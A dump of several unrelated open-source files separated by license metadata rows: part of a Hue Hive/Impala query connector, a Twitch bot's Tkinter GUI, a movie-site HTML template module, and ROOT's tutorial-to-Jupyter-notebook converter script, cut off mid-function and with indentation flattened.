} for column in results.data_table.cols()],
'type': 'table'
}
@query_error_handler
def fetch_result_metadata(self):
pass
@query_error_handler
def cancel(self, notebook, snippet):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
db.cancel_operation(handle)
return {'status': 0}
@query_error_handler
def get_log(self, notebook, snippet, startFrom=None, size=None):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
return db.get_log(handle, start_over=startFrom == 0)
@query_error_handler
def close_statement(self, snippet):
if snippet['type'] == 'impala':
from impala import conf as impala_conf
if (snippet['type'] == 'hive' and beeswax_conf.CLOSE_QUERIES.get()) or (snippet['type'] == 'impala' and impala_conf.CLOSE_QUERIES.get()):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
db.close_operation(handle)
return {'status': 0}
else:
return {'status': -1} # skipped
@query_error_handler
def download(self, notebook, snippet, format):
try:
db = self._get_db(snippet)
handle = self._get_handle(snippet)
# Test handle to verify if still valid
db.fetch(handle, start_over=True, rows=1)
return data_export.download(handle, format, db, id=snippet['id'])
except Exception, e:
title = 'The query result cannot be downloaded.'
LOG.exception(title)
if hasattr(e, 'message') and e.message:
message = e.message
else:
message = e
raise PopupException(_(title), detail=message)
@query_error_handler
def progress(self, snippet, logs):
if snippet['type'] == 'hive':
match = re.search('Total jobs = (\d+)', logs, re.MULTILINE)
total = int(match.group(1)) if match else 1
started = logs.count('Starting Job')
ended = logs.count('Ended Job')
progress = int((started + ended) * 100 / (total * 2))
return max(progress, 5) # Return 5% progress as a minimum
elif snippet['type'] == 'impala':
match = re.findall('(\d+)% Complete', logs, re.MULTILINE)
# Retrieve the last reported progress percentage if it exists
return int(match[-1]) if match and isinstance(match, list) else 0
else:
return 50
@query_error_handler
def get_jobs(self, notebook, snippet, logs):
jobs = []
if snippet['type'] == 'hive':
engine = self._get_hive_execution_engine(notebook, snippet)
jobs_with_state = _parse_out_hadoop_jobs(logs, engine=engine, with_state=True)
jobs = [{
'name': job.get('job_id', ''),
'url': reverse('jobbrowser.views.single_job', kwargs={'job': job.get('job_id', '')}),
'started': job.get('started', False),
'finished': job.get('finished', False)
} for job in jobs_with_state]
return jobs
@query_error_handler
def autocomplete(self, snippet, database=None, table=None, column=None, nested=None):
db = self._get_db(snippet)
return _autocomplete(db, database, table, column, nested)
@query_error_handler
def get_sample_data(self, snippet, database=None, table=None, column=None):
db = self._get_db(snippet)
return _get_sample_data(db, database, table, column)
@query_error_handler
def explain(self, notebook, snippet):
db = self._get_db(snippet)
response = self._get_current_statement(db, snippet)
session = self._get_session(notebook, snippet['type'])
query = self._prepare_hql_query(snippet, response.pop('statement'), session)
try:
explanation = db.explain(query)
except QueryServerException, ex:
raise QueryError(ex.message)
return {
'status': 0,
'explanation': explanation.textual,
'statement': query.get_query_statement(0),
}
@query_error_handler
def export_data_as_hdfs_file(self, snippet, target_file, overwrite):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
upload(target_file, handle, self.request.user, db, self.request.fs)
return '/filebrowser/view=%s' % target_file
def export_data_as_table(self, notebook, snippet, destination):
db = self._get_db(snippet)
response = self._get_current_statement(db, snippet)
session = self._get_session(notebook, snippet['type'])
query = self._prepare_hql_query(snippet, response.pop('statement'), session)
if 'select' not in query.hql_query.strip().lower():
raise Exception(_('Only SELECT statements can be saved. Provided statement: %(query)s') % {'query': query.hql_query})
database = snippet.get('database') or 'default'
table = destination
if '.' in table:
database, table = table.split('.', 1)
db.use(query.database)
hql = 'CREATE TABLE `%s`.`%s` AS %s' % (database, table, query.hql_query)
success_url = reverse('metastore:describe_table', kwargs={'database': database, 'table': table})
return hql, success_url
def export_large_data_to_hdfs(self, notebook, snippet, destination):
db = self._get_db(snippet)
response = self._get_current_statement(db, snippet)
session = self._get_session(notebook, snippet['type'])
query = self._prepare_hql_query(snippet, response.pop('statement'), session)
if 'select' not in query.hql_query.strip().lower():
raise Exception(_('Only SELECT statements can be saved. Provided statement: %(query)s') % {'query': query.hql_query})
db.use(query.database)
hql = "INSERT OVERWRITE DIRECTORY '%s' %s" % (destination, query.hql_query)
success_url = '/filebrowser/view=%s' % destination
return hql, success_url
def upgrade_properties(self, lang='hive', properties=None):
upgraded_properties = copy.deepcopy(self.get_properties(lang))
# Check that current properties is a list of dictionary objects with 'key' and 'value' keys
if not isinstance(properties, list) or \
not all(isinstance(prop, dict) for prop in properties) or \
not all('key' in prop for prop in properties) or not all('value' in prop for prop in properties):
LOG.warn('Current properties are not formatted correctly, will replace with defaults.')
return upgraded_properties
valid_props_dict = dict((prop["key"], prop) for prop in upgraded_properties)
curr_props_dict = dict((prop['key'], prop) for prop in properties)
# Upgrade based on valid properties as needed
if set(valid_props_dict.keys()) != set(curr_props_dict.keys()):
settings = next((prop for prop in upgraded_properties if prop['key'] == 'settings'), None)
if settings is not None and isinstance(properties, list):
settings['value'] = properties
else: # No upgrade needed so return existing properties
upgraded_properties = properties
return upgraded_properties
def _get_session(self, notebook, type='hive'):
session = next((session for session in notebook['sessions'] if session['type'] == type), None)
return session
def _get_hive_execution_engine(self, notebook, snippet):
# Get hive.execution.engine from snippet properties, if none, then get from session
properties = snippet['properties']
settings = properties.get('settings', [])
if not settings:
session = self._get_session(notebook, 'hive')
if not session:
LOG.warn('Cannot get jobs, failed to find active HS2 session for user: %s' % self.user.username)
else:
properties = session['properties']
settings = next((prop['value'] for prop in properties if prop['key'] == 'settings'), None)
if settings:
engine = next((setting['value'] for setting in settings if setting['key'] == 'hive.execution.engine'), DEFAULT_HIVE_ENGINE)
else:
engine = DEFAULT_HIVE_ENGINE
return engine
def _get_statements(self, hql_query):
hql_query = strip_trailing_semicolon(hql_query)
hql_query_sio = StringIO.StringIO(hql_query)
statements = []
for (start_row, start_col), (end_row, end_col), statement in split_statements(hql_query_sio.read()):
statements.append({
'start': {
'row': start_row,
'column': start_col
},
'end': {
'row': end_row,
'column': end_col
},
'statement': strip_trailing_semicolon(statement.strip())
})
return statements
def _get_current_statement(self, db, snippet):
# Multiquery, if not first statement or arrived to the last query
statement_id = snippet['result']['handle'].get('statement_id', 0)
statements_count = snippet['result']['handle'].get('statements_count', 1)
if snippet['result']['handle'].get('has_more_statements'):
try:
handle = self._get_handle(snippet)
db.close_operation(handle) # Close all the time past multi queries
except:
LOG.warn('Could not close previous multiquery query')
statement_id += 1
else:
statement_id = 0
statements = self._get_statements(snippet['statement'])
resp = {
'statement_id': statement_id,
'has_more_statements': statement_id < len(statements) - 1,
'statements_count': len(statements)
}
if statements_count != len(statements):
statement_id = 0
resp.update(statements[statement_id])
return resp
def _prepare_hql_query(self, snippet, statement, session):
settings = snippet['properties'].get('settings', None)
file_resources = snippet['properties'].get('files', None)
functions = snippet['properties'].get('functions', None)
properties = session['properties'] if session else []
# Get properties from session if not defined in snippet
if not settings:
settings = next((prop['value'] for prop in properties if prop['key'] == 'settings'), None)
if not file_resources:
file_resources = next((prop['value'] for prop in properties if prop['key'] == 'files'), None)
if not functions:
functions = next((prop['value'] for prop in properties if prop['key'] == 'functions'), None)
database = snippet.get('database') or 'default'
return hql_query(
statement,
query_type=QUERY_TYPES[0],
settings=settings,
file_resources=file_resources,
functions=functions,
database=database
)
def get_select_star_query(self, snippet, database, table):
db = self._get_db(snippet)
table = db.get_table(database, table)
return db.get_select_star_query(database, table)
def _get_handle(self, snippet):
snippet['result']['handle']['secret'], snippet['result']['handle']['guid'] = HiveServerQueryHandle.get_decoded(snippet['result']['handle']['secret'], snippet['result']['handle']['guid'])
for key in snippet['result']['handle'].keys():
if key not in ('log_context', 'secret', 'has_result_set', 'operation_type', 'modified_row_count', 'guid'):
snippet['result']['handle'].pop(key)
return HiveServerQueryHandle(**snippet['result']['handle'])
def _get_db(self, snippet):
if snippet['type'] == 'hive':
name = 'beeswax'
elif snippet['type'] == 'impala':
name = 'impala'
else:
name = 'spark-sql'
return dbms.get(self.user, query_server=get_query_server_config(name=name))
|
apache-2.0
| -1,149,335,945,032,415,200
| 31.518033
| 190
| 0.661877
| false
| 3.789112
| true
| false
| false
|
LaurensScheldeman/TwitchBot
|
src/lib/gui.py
|
1
|
2462
|
import string
from datetime import datetime
import Tkinter as tk
import ttk
import tkFont
import webbrowser
import socket
import src.lib.fileHandler as fileHandler
import src.lib.twitchHandler as twitchHandler
from src.lib.irc import irc as irc_
from src.lib.variables import global_variables
from src.lib.gui_botsettings import Botsettings
from src.lib.gui_commands import Commands
class GUI():
def __init__(self):
# GUI
self.__ROOT = tk.Tk()
self.__ROOT.withdraw() # Makes gui invisible
# Loading window
loading = tk.Tk()
loading.wm_title(' ')
loading.iconbitmap('src/images/santaBot_icon.ico')
tk.Label(loading, text='Loading SantaBot...', padx=20, pady=10).grid(row=1,column=0)
loading.update()
self.__ROOT.wm_title('SantaBot v0.2.0')
self.__ROOT.iconbitmap('src/images/santaBot_icon.ico')
self.__active = True
self.__ROOT.protocol("WM_DELETE_WINDOW", self.__quit)
self.__notebook = ttk.Notebook(self.__ROOT, width=1120, height=690)
# Tab1: Botsettings
self.__botsettings = Botsettings(self.__notebook)
self.__config = fileHandler.read_json('data/SantaBot/config.json')
# Tab2: commands
self.__commands = Commands(self.__notebook)
self.__notebook.grid(row=1, column=0, columnspan=10, sticky='wen', padx=15, pady=15)
# Buttons
button_frame = tk.Frame(self.__ROOT)
button_frame.grid(row=2, column = 9)
tk.Button(button_frame, text='Save changes', command=self.__save, width=13).grid(row=0, column=0, padx=5, pady=(0,20))
tk.Button(button_frame, text='Quit', command=self.__quit, width=13).grid(row=0, column=1, padx=5, pady=(0,20))
# Save initial state
self.__save()
self.__ROOT.deiconify() # Makes gui visible
loading.destroy() # Delete loading window
def update(self):
self.__ROOT.update() # Update the GUI itself
def check_active(self):
return self.__active
def add_chatmessage(self, user, message):
self.__botsettings.add_chatmessage(user, message)
def get_irc_connection_status(self):
return self.__botsettings.irc_connection
def __save(self):
# config.json
self.__botsettings.save()
# config_commands.json
self.__commands.save()
def __quit(self):
self.__active = False
self.__ROOT.destroy()
|
gpl-3.0
| 2,424,998,428,401,631,000
| 28.662651
| 126
| 0.632006
| false
| 3.62592
| false
| false
| false
|
janist7/udacity-movie-site-development
|
python/templates/template_main.py
|
1
|
2546
|
"""Contains parts of the main template - head, nav and footer"""
#Uses code from this reposatory:
#https://github.com/adarsh0806/ud036_StarterCode/blob/master/fresh_tomatoes.py
def get_template():
'''Contains main template'''
# Styles and scripting for the page
main_page_head = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Fresh Tomatoes!</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Bootstrap 3 -->
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap.min.css">
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap-theme.min.css">
<script src="https://code.jquery.com/jquery-1.10.1.min.js"></script>
<script src="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/js/bootstrap.min.js"></script>
<!-- Roboto -->
<link href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i" rel="stylesheet">
<!-- Css/Js -->
<link rel="stylesheet" href="css/main.css">
<script src="js/main.js"></script>
</head>
'''
# Page navigation
main_page_navigation = '''
<nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="index.html">Movie Trailers</a>
</div>
<div class="collapse navbar-collapse" id="myNavbar">
<ul class="nav navbar-nav">
<li><a class="navbar-nav" href="index.html">Main</a></li>
<li><a class="navbar-nav" href="fresh_tomatoes_upload.html">Upload Movie</a></li>
</ul>
</div>
</div>
</nav>
'''
# Page footer
main_page_footer = '''
<footer class="container-fluid bg-4 text-center">
<p>© Copyright: Janis Tidrikis</p>
</footer>
'''
main_template_subparts = {
"main_page_head":main_page_head,
"main_page_navigation":main_page_navigation,
"main_page_footer":main_page_footer
}
return main_template_subparts
|
gpl-3.0
| -7,364,092,432,295,013,000
| 41.433333
| 139
| 0.584446
| false
| 3.41745
| false
| false
| false
|
lgiommi/root
|
documentation/doxygen/converttonotebook.py
|
1
|
35395
|
#!/usr/bin/env python
# Author: Pau Miquel i Mir <pau.miquel.mir@cern.ch> <pmm1g15@soton.ac.uk>>
# Date: July, 2016
#
# DISCLAIMER: This script is a prototype and a work in progress. Indeed, it is possible that
# it may not work for certain tutorials, and that it, or the tutorial, might need to be
# tweaked slightly to ensure full functionality. Please do not hesistate to email the author
# with any questions or with examples that do not work.
#
# HELP IT DOESN'T WORK: Two possible solutions:
# 1. Check that all the types returned by the tutorial are in the gTypesList. If they aren't,
# simply add them.
# 2. If the tutorial takes a long time to execute (more than 90 seconds), add the name of the
# tutorial to the list of long tutorials listLongTutorials, in the fucntion findTimeout.
#
# REQUIREMENTS: This script needs jupyter to be properly installed, as it uses the python
# package nbformat and calls the shell commands `jupyter nbconvert` and `jupyter trust`. The
# rest of the packages used should be included in a standard installation of python. The script
# is intended to be run on a UNIX based system.
#
#
# FUNCTIONING:
# -----------
# The converttonotebook script creates Jupyter notebooks from raw C++ or python files.
# Particulary, it is indicated to convert the ROOT tutorials found in the ROOT
# repository.
#
# The script should be called from bash with the following format:
# python /path/to/script/converttonotebook.py /path/to/<macro>.C /path/to/outdir
#
# Indeed the script takes two arguments, the path to the macro and the path to the directory
# where the notebooks will be created
#
# The script's general functioning is as follows. The macro to be converted is imported as a string.
# A series of modifications are made to this string, for instance delimiting where markdown and
# code cells begin and end. Then, this string is converted into ipynb format using a function
# in the nbconvert package. Finally, the notebook is executed and output.
#
# For converting python tutorials it is fairly straightforward. It extracts the decription and
# author information from the header and then removes it. It also converts any comment at the
# beginning of a line into a Markdown cell.
#
# For C++ files the process is slightly more complex. The script separates the functions from the
# main code. The main function is identified as it has the smae name as the macro file. The other
# functions are considered functions. The main function is "extracted" and presented as main code.
# The helper functions are placed in their own code cell with the %%cpp -d magic to enable function
# defintion. Finally, as with Python macros, relevant information is extracted from the header, and
# newline comments are converted into Markdown cells (unless they are in helper functions).
#
# The script creates an .ipynb version of the macro, with the full output included.
# The files are named:
# <macro>.<C or py>.nbconvert.ipynb
#
# It is called by filter.cxx, which in turn is called by doxygen when processing any file
# in the ROOT repository. filter.cxx only calls convertonotebook.py when the string \notebook
# is found in the header of the turorial, but this script checks for its presence as well.
import re
import os
import sys
import json
import time
import doctest
import textwrap
import subprocess
from nbformat import v3, v4
from datetime import datetime, date
# List of types that will be considered when looking for a C++ function. If a macro returns a
# type not included on the list, the regular expression will not match it, and thus the function
# will not be properly defined. Thus, any other type returned by function must be added to this list
# for the script to work correctly.
gTypesList = ["void", "int", "Int_t", "TF1", "string", "bool", "double", "float", "char",
"TCanvas", "TTree", "TString", "TSeqCollection", "Double_t", "TFile", "Long64_t", "Bool_t", "TH1",
"RooDataSet", "RooWorkspace" , "HypoTestInverterResult" , "TVectorD" , "TArrayF", "UInt_t"]
# -------------------------------------
# -------- Fuction definitions---------
# -------------------------------------
def unindenter(string, spaces = 3):
"""
Returns string with each line unindented by 3 spaces. If line isn't indented, it stays the same.
>>> unindenter(" foobar")
'foobar\\n'
>>> unindenter("foobar")
'foobar\\n'
>>> unindenter('''foobar
... foobar
... foobar''')
'foobar\\nfoobar\\nfoobar\\n'
"""
newstring = ''
lines = string.splitlines()
for line in lines:
if line.startswith(spaces*' '):
newstring += (line[spaces:] + "\n")
else:
newstring += (line + "\n")
return newstring
def readHeaderPython(text):
"""
Extract author and description from header, eliminate header from text. Also returns
notebook boolean, which is True if the string \notebook is present in the header
Also determine options (-js, -nodraw, -header) passed in \notebook command, and
return their booleans
>>> readHeaderPython('''## \\file
... ## \\ingroup tutorials
... ## \\\\notebook
... ## This is the description of the tutorial
... ##
... ## \\macro_image
... ## \\macro_code
... ##
... ## \\\\author John Brown
... def tutorialfuncion()''')
('def tutorialfuncion()\\n', 'This is the description of the tutorial\\n\\n\\n', 'John Brown', True, False, False, False)
>>> readHeaderPython('''## \\file
... ## \\ingroup tutorials
... ## \\\\notebook -js
... ## This is the description of the tutorial
... ##
... ## \\macro_image
... ## \\macro_code
... ##
... ## \\\\author John Brown
... def tutorialfuncion()''')
('def tutorialfuncion()\\n', 'This is the description of the tutorial\\n\\n\\n', 'John Brown', True, True, False, False)
>>> readHeaderPython('''## \\file
... ## \\ingroup tutorials
... ## \\\\notebook -nodraw
... ## This is the description of the tutorial
... ##
... ## \\macro_image
... ## \\macro_code
... ##
... ## \\\\author John Brown
... def tutorialfuncion()''')
('def tutorialfuncion()\\n', 'This is the description of the tutorial\\n\\n\\n', 'John Brown', True, False, True, False)
"""
lines = text.splitlines()
description = ''
author = ''
isNotebook = False
isJsroot = False
nodraw = False
needsHeaderFile = False
for i, line in enumerate(lines):
if line.startswith("## \\aut"):
author = line[11:]
elif line.startswith("## \\note"):
isNotebook = True
if "-js" in line:
isJsroot = True
if "-nodraw" in line:
nodraw = True
if "-header" in line:
needsHeaderFile = True
elif line.startswith("##"):
if not line.startswith("## \\") and isNotebook:
description += (line[3:] + '\n')
else:
break
newtext = ''
for line in lines[i:]:
newtext += (line + "\n")
return newtext, description, author, isNotebook, isJsroot, nodraw, needsHeaderFile
def pythonComments(text):
"""
Converts comments delimited by # or ## and on a new line into a markdown cell.
For python files only
>>> pythonComments('''## This is a
... ## multiline comment
... def function()''')
'# <markdowncell>\\n## This is a\\n## multiline comment\\n# <codecell>\\ndef function()\\n'
>>> pythonComments('''def function():
... variable = 5 # Comment not in cell
... # Comment also not in cell''')
'def function():\\n variable = 5 # Comment not in cell\\n # Comment also not in cell\\n'
"""
text = text.splitlines()
newtext = ''
inComment = False
for i, line in enumerate(text):
if line.startswith("#") and not inComment: # True if first line of comment
inComment = True
newtext += "# <markdowncell>\n"
newtext += (line + "\n")
elif inComment and not line.startswith("#"): # True if first line after comment
inComment = False
newtext += "# <codecell>\n"
newtext += (line+"\n")
else:
newtext += (line+"\n")
return newtext
def pythonMainFunction(text):
lines = text.splitlines()
functionContentRe = re.compile('def %s\\(.*\\):' % tutName , flags = re.DOTALL | re.MULTILINE)
newtext = ''
inMainFunction = False
hasMainFunction = False
for line in lines:
if hasMainFunction:
if line.startswith("""if __name__ == "__main__":""") or line.startswith("""if __name__ == '__main__':"""):
break
match = functionContentRe.search(line)
if inMainFunction and not line.startswith(" ") and line != "":
inMainFunction = False
if match:
inMainFunction = True
hasMainFunction = True
else:
if inMainFunction:
newtext += (line[4:] + '\n')
else:
newtext += (line + '\n')
return newtext
def readHeaderCpp(text):
"""
Extract author and description from header, eliminate header from text. Also returns
notebook boolean, which is True if the string \notebook is present in the header
Also determine options (-js, -nodraw, -header) passed in \notebook command, and
return their booleans
>>> readHeaderCpp('''/// \\file
... /// \\ingroup tutorials
... /// \\\\notebook
... /// This is the description of the tutorial
... ///
... /// \\macro_image
... /// \\macro_code
... ///
... /// \\\\author John Brown
... void tutorialfuncion(){}''')
('void tutorialfuncion(){}\\n', '# This is the description of the tutorial\\n# \\n# \\n', 'John Brown', True, False, False, False)
>>> readHeaderCpp('''/// \\file
... /// \\ingroup tutorials
... /// \\\\notebook -js
... /// This is the description of the tutorial
... ///
... /// \\macro_image
... /// \\macro_code
... ///
... /// \\\\author John Brown
... void tutorialfuncion(){}''')
('void tutorialfuncion(){}\\n', '# This is the description of the tutorial\\n# \\n# \\n', 'John Brown', True, True, False, False)
>>> readHeaderCpp('''/// \\file
... /// \\ingroup tutorials
... /// \\\\notebook -nodraw
... /// This is the description of the tutorial
... ///
... /// \\macro_image
... /// \\macro_code
... ///
... /// \\\\author John Brown
... void tutorialfuncion(){}''')
('void tutorialfuncion(){}\\n', '# This is the description of the tutorial\\n# \\n# \\n', 'John Brown', True, False, True, False)
"""
lines = text.splitlines()
description = ''
author = ''
isNotebook = False
isJsroot = False
nodraw = False
needsHeaderFile = False
for i, line in enumerate(lines):
if line.startswith("/// \\aut"):
author = line[12:]
if line.startswith("/// \\note"):
isNotebook = True
if "-js" in line:
isJsroot = True
if "-nodraw" in line:
nodraw = True
if "-header" in line:
needsHeaderFile = True
if line.startswith("///"):
if not line.startswith("/// \\") and isNotebook:
description += ('# ' + line[4:] + '\n')
else:
break
newtext = ''
for line in lines[i:]:
newtext += (line + "\n")
description = description.replace("\\f$", "$")
description = description.replace("\\f[", "$$")
description = description.replace("\\f]", "$$")
return newtext, description, author, isNotebook, isJsroot, nodraw, needsHeaderFile
def cppFunction(text):
"""
Extracts main function for the function enclosure by means of regular expression
>>> cppFunction('''void mainfunction(arguments = values){
... content of function
... which spans
... several lines
... }''')
'\\n content of function\\n which spans\\n several lines\\n'
>>> cppFunction('''void mainfunction(arguments = values)
... {
... content of function
... which spans
... several lines
... }''')
'\\n content of function\\n which spans\\n several lines\\n'
>>> cppFunction('''void mainfunction(arguments = values
... morearguments = morevalues)
... {
... content of function
... which spans
... several lines
... }''')
'\\n content of function\\n which spans\\n several lines\\n'
"""
functionContentRe = re.compile(r'(?<=\{).*(?=^\})', flags = re.DOTALL | re.MULTILINE)
match = functionContentRe.search(text)
if match:
return match.group()
else:
return text
def cppComments(text):
"""
Converts comments delimited by // and on a new line into a markdown cell. For C++ files only.
>>> cppComments('''// This is a
... // multiline comment
... void function(){}''')
'# <markdowncell>\\n# This is a\\n# multiline comment\\n# <codecell>\\nvoid function(){}\\n'
>>> cppComments('''void function(){
... int variable = 5 // Comment not in cell
... // Comment also not in cell
... }''')
'void function(){\\n int variable = 5 // Comment not in cell\\n // Comment also not in cell\\n}\\n'
"""
text = text.splitlines()
newtext = ''
inComment = False
for line in text:
if line.startswith("//") and not inComment: # True if first line of comment
inComment = True
newtext += "# <markdowncell>\n"
if line[2:].lstrip().startswith("#"): # Don't use .capitalize() if line starts with hash, ie it is a header
newtext += ("# " + line[2:]+"\n")
else:
newtext += ("# " + line[2:].lstrip().capitalize()+"\n")
elif inComment and not line.startswith("//"): # True if first line after comment
inComment = False
newtext += "# <codecell>\n"
newtext += (line+"\n")
elif inComment and line.startswith("//"): # True if in the middle of a comment block
newtext += ("# " + line[2:] + "\n")
else:
newtext += (line+"\n")
return newtext
def split(text):
"""
Splits the text string into main, helpers, and rest. main is the main function,
i.e. the function tha thas the same name as the macro file. Helpers is a list of
strings, each a helper function, i.e. any other function that is not the main function.
Finally, rest is a string containing any top-level code outside of any function.
Comments immediately prior to a helper cell are converted into markdown cell,
added to the helper, and removed from rest.
Intended for C++ files only.
>>> split('''void tutorial(){
... content of tutorial
... }''')
('void tutorial(){\\n content of tutorial\\n}', [], '')
>>> split('''void tutorial(){
... content of tutorial
... }
... void helper(arguments = values){
... helper function
... content spans lines
... }''')
('void tutorial(){\\n content of tutorial\\n}', ['\\n# <markdowncell>\\n A helper function is created: \\n# <codecell>\\n%%cpp -d\\nvoid helper(arguments = values){\\n helper function\\n content spans lines\\n}'], '')
>>> split('''#include <header.h>
... using namespace NAMESPACE
... void tutorial(){
... content of tutorial
... }
... void helper(arguments = values){
... helper function
... content spans lines
... }''')
('void tutorial(){\\n content of tutorial\\n}', ['\\n# <markdowncell>\\n A helper function is created: \\n# <codecell>\\n%%cpp -d\\nvoid helper(arguments = values){\\n helper function\\n content spans lines\\n}'], '#include <header.h>\\nusing namespace NAMESPACE')
>>> split('''void tutorial(){
... content of tutorial
... }
... // This is a multiline
... // description of the
... // helper function
... void helper(arguments = values){
... helper function
... content spans lines
... }''')
('void tutorial(){\\n content of tutorial\\n}', ['\\n# <markdowncell>\\n This is a multiline\\n description of the\\n helper function\\n \\n# <codecell>\\n%%cpp -d\\nvoid helper(arguments = values){\\n helper function\\n content spans lines\\n}'], '')
"""
functionReString="("
for cpptype in gTypesList:
functionReString += ("^%s|") % cpptype
functionReString = functionReString[:-1] + r")\s?\*?&?\s?[\w:]*?\s?\([^\)]*\)\s*\{.*?^\}"
functionRe = re.compile(functionReString, flags = re.DOTALL | re.MULTILINE)
#functionre = re.compile(r'(^void|^int|^Int_t|^TF1|^string|^bool|^double|^float|^char|^TCanvas|^TTree|^TString|^TSeqCollection|^Double_t|^TFile|^Long64_t|^Bool_t)\s?\*?\s?[\w:]*?\s?\([^\)]*\)\s*\{.*?^\}', flags = re.DOTALL | re.MULTILINE)
functionMatches = functionRe.finditer(text)
helpers = []
main = ""
for matchString in [match.group() for match in functionMatches]:
if tutName == findFunctionName(matchString): # if the name of the function is that of the macro
main = matchString
else:
helpers.append(matchString)
# Create rest by replacing the main and helper functions with blank strings
rest = text.replace(main, "")
for helper in helpers:
rest = rest.replace(helper, "")
newHelpers = []
lines = text.splitlines()
for helper in helpers: # For each helper function
for i, line in enumerate(lines): # Look through the lines until the
if line.startswith(helper[:helper.find("\n")]): # first line of the helper is found
j = 1
commentList = []
while lines[i-j].startswith("//"): # Add comment lines immediately prior to list
commentList.append(lines[i-j])
j += 1
if commentList: # Convert list to string
commentList.reverse()
helperDescription = ''
for comment in commentList:
if comment in ("//", "// "):
helperDescription += "\n\n" # Two newlines to create hard break in Markdown
else:
helperDescription += (comment[2:] + "\n")
rest = rest.replace(comment, "")
break
else: # If no comments are found create generic description
helperDescription = "A helper function is created:"
break
if findFunctionName(helper) != "main": # remove void main function
newHelpers.append("\n# <markdowncell>\n " + helperDescription + " \n# <codecell>\n%%cpp -d\n" + helper)
rest = rest.rstrip("\n /") # remove newlines and empty comments at the end of string
return main, newHelpers, rest
def findFunctionName(text):
"""
Takes a string representation of a C++ function as an input,
finds and returns the name of the function
>>> findFunctionName('void functionName(arguments = values){}')
'functionName'
>>> findFunctionName('void functionName (arguments = values){}')
'functionName'
>>> findFunctionName('void *functionName(arguments = values){}')
'functionName'
>>> findFunctionName('void* functionName(arguments = values){}')
'functionName'
>>> findFunctionName('void * functionName(arguments = values){}')
'functionName'
>>> findFunctionName('void class::functionName(arguments = values){}')
'class::functionName'
"""
functionNameReString="(?<="
for cpptype in gTypesList:
functionNameReString += ("(?<=%s)|") % cpptype
functionNameReString = functionNameReString[:-1] + r")\s?\*?\s?[^\s]*?(?=\s?\()"
functionNameRe = re.compile(functionNameReString, flags = re.DOTALL | re.MULTILINE)
#functionnamere = re.compile(r'(?<=(?<=int)|(?<=void)|(?<=TF1)|(?<=Int_t)|(?<=string)|(?<=double)|(?<=Double_t)|(?<=float)|(?<=char)|(?<=TString)|(?<=bool)|(?<=TSeqCollection)|(?<=TCanvas)|(?<=TTree)|(?<=TFile)|(?<=Long64_t)|(?<=Bool_t))\s?\*?\s?[^\s]*?(?=\s?\()', flags = re.DOTALL | re.MULTILINE)
match = functionNameRe.search(text)
functionname = match.group().strip(" *\n")
return functionname
def processmain(text):
"""
Evaluates whether the main function returns a TCanvas or requires input. If it
does then the keepfunction flag is True, meaning the function wont be extracted
by cppFunction. If the initial condition is true then an extra cell is added
before at the end that calls the main function is returned, and added later.
>>> processmain('''void function(){
... content of function
... spanning several
... lines
... }''')
('void function(){\\n content of function\\n spanning several\\n lines\\n}', '')
>>> processmain('''void function(arguments = values){
... content of function
... spanning several
... lines
... }''')
('void function(arguments = values){\\n content of function\\n spanning several\\n lines\\n}', '# <markdowncell> \\n Arguments are defined. \\n# <codecell>\\narguments = values;\\n# <codecell>\\n')
>>> processmain('''void function(argument1 = value1, //comment 1
... argument2 = value2 /*comment 2*/ ,
... argument3 = value3,
... argument4 = value4)
... {
... content of function
... spanning several
... lines
... }''')
('void function(argument1 = value1, //comment 1\\n argument2 = value2 /*comment 2*/ ,\\n argument3 = value3, \\n argument4 = value4)\\n{\\n content of function\\n spanning several\\n lines\\n}', '# <markdowncell> \\n Arguments are defined. \\n# <codecell>\\nargument1 = value1;\\nargument2 = value2;\\nargument3 = value3;\\nargument4 = value4;\\n# <codecell>\\n')
>>> processmain('''TCanvas function(){
... content of function
... spanning several
... lines
... return c1
... }''')
('TCanvas function(){\\n content of function\\n spanning several \\n lines\\n return c1\\n}', '')
"""
argumentsCell = ''
if text:
argumentsre = re.compile(r'(?<=\().*?(?=\))', flags = re.DOTALL | re.MULTILINE)
arguments = argumentsre.search(text)
if len(arguments.group()) > 3:
argumentsCell = "# <markdowncell> \n Arguments are defined. \n# <codecell>\n"
individualArgumentre = re.compile(r'[^/\n,]*?=[^/\n,]*') #, flags = re.DOTALL) #| re.MULTILINE)
argumentList=individualArgumentre.findall(arguments.group())
for argument in argumentList:
argumentsCell += argument.strip("\n ") + ";\n"
argumentsCell += "# <codecell>\n"
return text, argumentsCell
# now define text transformers
def removePaletteEditor(code):
code = code.replace("img->StartPaletteEditor();", "")
code = code.replace("Open the color editor", "")
return code
def runEventExe(code):
if "copytree" in tutName:
return "# <codecell> \n.! $ROOTSYS/test/eventexe 1000 1 1 1 \n" + code
return code
def getLibMathMore(code):
if "quasirandom" == tutName:
return "# <codecell> \ngSystem->Load(\"libMathMore\"); \n# <codecell> \n" + code
return code
def roofitRemoveSpacesComments(code):
def changeString(matchObject):
matchString = matchObject.group()
matchString = matchString[0] + " " + matchString[1:]
matchString = matchString.replace(" " , "THISISASPACE")
matchString = matchString.replace(" " , "")
matchString = matchString.replace("THISISASPACE" , " ")
return matchString
newcode = re.sub("#\s\s?\w\s[\w-]\s\w.*", changeString , code)
return newcode
def declareNamespace(code):
if "using namespace RooFit;\nusing namespace RooStats;" in code:
code = code.replace("using namespace RooFit;\nusing namespace RooStats;", "# <codecell>\n%%cpp -d\n// This is a workaround to make sure the namespace is used inside functions\nusing namespace RooFit;\nusing namespace RooStats;\n# <codecell>\n")
else:
